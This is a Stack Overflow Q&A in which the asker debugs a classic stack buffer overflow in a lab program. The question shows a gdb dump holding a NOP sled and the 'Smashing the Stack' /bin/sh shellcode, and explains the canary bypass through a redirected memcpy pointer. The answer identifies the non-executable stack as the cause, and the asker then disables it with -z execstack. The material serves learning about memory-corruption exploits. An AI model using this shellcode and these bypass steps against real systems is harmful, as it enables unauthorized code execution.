Buffer overflow : EIP and jump correctly set but segfault

Question

I am performing a buffer overflow, by avoiding the canary through a memcpy to a pointer, as explained here . In short, you overwrite the address a pointer points to, with the address of the RET in the stack. So memcpy-ing to that pointer, effectively overwrites RET.

Using gdb, I inject my NOP-sled + shellcode + address_overwrite just fine. I can see that RET, at 0xbffff52c, contains a desired address, 0xbffff4c0, that will land in the NOP sled.

(gdb) x /32xw $esp 0xbffff470: 0xbffff52c 0x0804a008 0x00000004 0x00000000 0xbffff480: 0x000003f3 0x08048327 0x90909087 0x90909090 0xbffff490: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4a0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4b0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4c0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff4d0: 0x90909090 0x90909090 0x90909090 0xeb909090 0xbffff4e0: 0x76895e1f 0x88c03108 0x46890746 0x890bb00c (gdb) 0xbffff4f0: 0x084e8df3 0xcd0c568d 0x89db3180 0x80cd40d8 0xbffff500: 0xffffdce8 0x69622fff 0x68732f6e 0xbffff52c 0xbffff510: 0xbffff5a8 0xb7ff5990 0x0000008f 0xbffff5a8 0xbffff520: 0xb7fd1ff4 0x0804a008 0xbffff5a8 0xbffff4c0 0xbffff530: 0x0804a008 0x0804a008 0x0000008f 0x00000001 0xbffff540: 0x00000801 0x00000000 0xbfff0000 0x002001ac 0xbffff550: 0x000081a4 0x00000001 0x000004ad 0x000004ad 0xbffff560: 0x00000000 0x00000000 0xb7fd0000 0x0000008f

However , running this I get the error bellow, even though dissasembly shows I landed good.

Program received signal SIGSEGV, Segmentation fault.
0xbffff4c0 in ?? ()
(gdb) disas 0xbffff4c0, + 10
Dump of assembler code from 0xbffff4c0 to 0xbffff4ca:
=> 0xbffff4c0:  nop
   0xbffff4c1:  nop
   0xbffff4c2:  nop
   0xbffff4c3:  nop
   0xbffff4c4:  nop
   0xbffff4c5:  nop
   0xbffff4c6:  nop
   0xbffff4c7:  nop
   0xbffff4c8:  nop
   0xbffff4c9:  nop

Further below is the shellcode.

    0xbffff4df:  jmp    0xbffff500
   0xbffff4e1:  pop    %esi
   0xbffff4e2:  mov    %esi,0x8(%esi)
   0xbffff4e5:  xor    %eax,%eax
   0xbffff4e7:  mov    %al,0x7(%esi)
   0xbffff4ea:  mov    %eax,0xc(%esi)
   0xbffff4ed:  mov    $0xb,%al
   0xbffff4ef:  mov    %esi,%ebx

... etc.

I used the shellcode from Smashing the stack , Appendix B, for the linux system. Can you help me understand what's wrong?

Did you disable NX protection? By default stack is not executable. — Jester, Apr 09 '16 at 00:12

score 4 · Accepted Answer · answered Apr 09 '16 at 00:28

4

You didn't say what OS you are on, or how you built your target program.

Assuming Linux and no -Wl,-z,execstack, modern Linux distributions default to -Wl,-z,noexecstack, which (surprise!) makes stack non-executable.

You can read about some of the protection mechanisms here.

answered Apr 09 '16 at 00:28

Employed Russian

199,314
34
295
362

I'm such an idiot! Completely missed the non executable stack obstacle. Compiling with the -z execstack option did the trick. Thanks a bunch. – npit Apr 09 '16 at 17:07

Buffer overflow : EIP and jump correctly set but segfault

1 Answers1